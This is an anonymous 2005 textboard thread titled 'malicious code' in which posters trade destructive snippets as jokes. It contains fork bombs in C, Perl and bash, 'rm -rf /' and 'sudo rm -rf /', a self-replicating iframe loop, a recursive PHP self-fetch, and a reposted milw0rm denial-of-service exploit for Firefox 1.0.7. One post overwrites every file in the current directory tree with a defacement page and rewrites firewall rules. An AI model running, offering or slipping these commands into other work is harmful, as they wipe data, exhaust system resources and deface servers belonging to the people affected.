malicious code (15)

1 Name: #!usr/bin/anon 2005-09-30 14:24 ID:Bf4ocx9K

<?php
echo(" ");
readfile("http://".$HTTP_HOST.$REQUEST_URI);
?>

2 Name: #!usr/bin/anon 2005-09-30 14:27 ID:Bf4ocx9K

<script>
while(true){
document.write('<iframe src="'+location.href+'"></iframe>');
}
</script>

3 Name: dmpk2k!hinhT6kz2E 2005-09-30 15:31 ID:qFnNPQAr

#include <unistd.h>

void main()
{
fork(); main();
}

4 Name: #!usr/bin/anon 2005-09-30 16:25 ID:Heaven

Mozilla Firefox <= 1.0.7 Integar Overflow Denial of Service Exploit

<!-- I think of mil more of as a security archive. :)

 Just to let people know
Georgi Guninski is one bad mofo /str0ke -->

<html>

    Copyright Georgi Guninski
<br>
Cannot be used in vulnerability databases
<br>
Especially securityfocus/mitre/cve/cert
<script>
var s=String.fromCharCode(257);
var ki="";
var me="";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;
    alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
</script>

</html>

# milw0rm.com [2005-09-26]

5 Name: #!usr/bin/anon 2005-10-01 02:51 ID:Bf4ocx9K

>>4
doesn't do anything except make "out of memory" show up in the javascript console on my firefox 1.0.7...

6 Name: #!usr/bin/anon 2005-11-21 06:51 ID:x4Cpq1Hj

perl -e "while(1){fork}"

7 Name: #!usr/bin/anon 2005-11-21 10:02 ID:Heaven

perl -e 'fork until 0'

8 Name: #!usr/bin/anon 2005-11-21 13:56 ID:YvceqjB6

:(){ :|:& };:

9 Name: #!usr/bin/anon 2005-11-22 06:08 ID:UD/n1YN3

rm -rf /

10 Name: #!usr/bin/anon 2005-11-22 15:32 ID:Bf4ocx9K

>>9
sudo rm -rf /

11 Name: #!usr/bin/anon 2005-11-23 13:52 ID:Heaven

I like imagining that I have an evil henchman named "Sudo".

Sudo, kill 1923!

12 Name: #!usr/bin/anon 2005-11-24 09:57 ID:BDtEdMQ/

echo 0wnz3d > /var/www/index.html
find -type f -exec cp /var/www/index.html {} \;
iptables -F INPUT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --sport 80 -j ACCEPT
iptables -A INPUT -j REJECT

13 Name: #!usr/bin/anon 2005-11-24 12:45 ID:Heaven

>>12 is a script kiddie. Also, an incompetent one.

14 Name: #!usr/bin/anon 2005-11-27 12:55 ID:7TNl9wlH

15 Name: #!usr/bin/anon 2005-11-30 11:27 ID:Heaven

>>13 wins!

This thread has been closed. You cannot post in this thread any longer.